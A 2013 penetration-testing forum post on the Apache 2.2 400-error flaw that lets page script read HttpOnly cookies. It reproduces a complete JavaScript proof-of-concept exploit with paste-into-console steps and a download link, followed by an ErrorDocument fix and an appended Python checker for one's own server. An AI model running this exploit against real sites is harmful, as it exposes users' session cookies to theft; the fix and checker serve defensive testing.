中国网络渗透测试联盟 (China Network Penetration Testing Alliance)

Title: Apache HttpOnly Cookie XSS vulnerability

Author: admin    Time: 2013-4-19 19:15
Title: Apache HttpOnly Cookie XSS vulnerability
Many applications, including commercial and mature open-source CMS article systems, add the HttpOnly attribute to their cookies to keep XSS from stealing the user's cookie: JavaScript is then denied direct access to it, which reduces the damage an XSS bug can do. This issue can be used to bypass exactly that HttpOnly attribute.

Open a site in Chrome, press F12 to open the developer tools, switch to the console, paste the following code and press Enter:
// http://www.exploit-db.com/exploits/18442/
function setCookies (good) {
    // Construct string for cookie value
    var str = "";
    for (var i=0; i< 819; i++) {
        str += "x";
    }
    // Set cookies
    for (i = 0; i < 10; i++) {
        // Expire evil cookie
        if (good) {
            var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
        }
        // Set evil cookie
        else {
            var cookie = "xss"+i+"="+str+";path=/";
        }
        document.cookie = cookie;
    }
}

function makeRequest() {
    setCookies();
    function parseCookies () {
        var cookie_dict = {};
        // Only react on 400 status
        if (xhr.readyState === 4 && xhr.status === 400) {
            // Replace newlines and match <pre> content
            var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
            // match() returns null when the error page carries no <pre> block
            if (content && content.length) {
                // Remove Cookie: prefix
                content = content[1].replace("Cookie: ", "");
                // Drop the padding cookies, keep the server's own ones
                var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
                // Add cookies to object
                for (var i=0; i<cookies.length; i++) {
                    var s_c = cookies[i].split('=',2);
                    cookie_dict[s_c[0]] = s_c[1];
                }
            }
            // Unset malicious cookies
            setCookies(true);
            alert(JSON.stringify(cookie_dict));
        }
    }
    // Make XHR request
    var xhr = new XMLHttpRequest();
    xhr.onreadystatechange = parseCookies;
    xhr.open("GET", "/", true);
    xhr.send(null);
}
makeRequest();

You will then see a glorious 400 error page that contains the cookie information.

Download: https://gist.github.com/pilate/1955a1c28324d4724b7b/download

Fix:

Apache officially provides four ways of handling errors (http://httpd.apache.org/docs/2.0/mod/core.html#errordocument):

In the event of a problem or error, Apache can be configured to do one of four things:

1. output a simple hardcoded error message
2. output a customized message
3. redirect to a local URL-path to handle the problem/error
4. redirect to an external URL to handle the problem/error

In my testing, only method 2 is effective for 400 errors: the response then no longer contains the cookie content.

Apache configuration:

ErrorDocument 400 "security test"

Of course, upgrading Apache to the latest version also works :).
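As a defender's regression check, added here and not part of the original post or of the exploit it quotes, the Python script below parses a 400 response the same way the script above does and reports which cookie names the error page reflected. It runs offline against two constructed sample bodies: the shape of the default Apache 2.2 "400 Bad Request" page, which echoes the offending request header inside <pre> tags, and the body produced once ErrorDocument 400 "security test" is configured. The cookie names, the sample bodies and the probe= cookie are made up for the demonstration; probe_server is a helper for re-checking your own Apache after applying the fix, and the 8190-byte figure is Apache's documented LimitRequestFieldSize default.

```python
import html
import http.client
import re

# Constructed sample: the shape of the default Apache 2.2 "400 Bad Request"
# page that echoes the over-long request header inside <pre>...</pre>.
# Cookie names and values here are made up for the demonstration.
VULNERABLE_400_BODY = (
    '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n'
    "<html><head><title>400 Bad Request</title></head><body>\n"
    "<h1>Bad Request</h1>\n"
    "<p>Your browser sent a request that this server could not understand.<br />\n"
    "Size of a request header field exceeds server limit.<br />\n"
    "<pre>\nCookie: PHPSESSID=abc123; xss0=xxxx; xss1=xxxx\n</pre>\n"
    "</p>\n</body></html>\n"
)

# Constructed sample: what the same server answers once
# ErrorDocument 400 "security test" is in place.
HARDENED_400_BODY = "security test"

PRE_RE = re.compile(r"<pre>(.*?)</pre>", re.DOTALL | re.IGNORECASE)


def echoed_headers(status, body):
    """Return {header_name: value} for request headers that a 400 response
    reflects inside <pre>. Non-400 responses or bodies without <pre> give {}."""
    if status != 400:
        return {}
    match = PRE_RE.search(body)
    if not match:
        return {}
    echoed = {}
    # Apache HTML-escapes the echoed header, so undo that before splitting.
    for line in html.unescape(match.group(1)).splitlines():
        if ":" in line:
            name, value = line.split(":", 1)
            echoed[name.strip()] = value.strip()
    return echoed


def exposed_cookie_names(status, body):
    """Names of cookies that page script could read back from the echoed
    Cookie header. With HttpOnly working as intended this list is empty."""
    names = []
    for name, value in echoed_headers(status, body).items():
        if name.lower() != "cookie":
            continue
        for pair in value.split(";"):
            pair = pair.strip()
            if pair:
                names.append(pair.split("=", 1)[0])
    return names


def probe_server(host, port=80, path="/", header_bytes=9000, timeout=5):
    """Regression check for an Apache host you administer: send one request
    whose Cookie header exceeds the default LimitRequestFieldSize (8190 bytes)
    and report whether the 400 page reflects it. Returns (status, exposed)."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.putrequest("GET", path)  # putrequest adds the Host header itself
        # The padding value carries no secret; only its length matters.
        conn.putheader("Cookie", "probe=" + "x" * header_bytes)
        conn.endheaders()
        resp = conn.getresponse()
        body = resp.read().decode("utf-8", errors="replace")
        return resp.status, exposed_cookie_names(resp.status, body)
    finally:
        conn.close()


if __name__ == "__main__":
    for label, body in (("default 400 page", VULNERABLE_400_BODY),
                        ('ErrorDocument 400 "security test"', HARDENED_400_BODY)):
        print(label, "->", exposed_cookie_names(400, body))
```

After setting the ErrorDocument directive (or upgrading), a call such as probe_server("www.example.com") on your own host should come back with an empty list as its second element; a non-empty list means the 400 page still reflects the Cookie header and HttpOnly can still be bypassed the way the post describes.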

Reference: http://httpd.apache.org/security/vulnerabilities_22.html





Welcome to 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2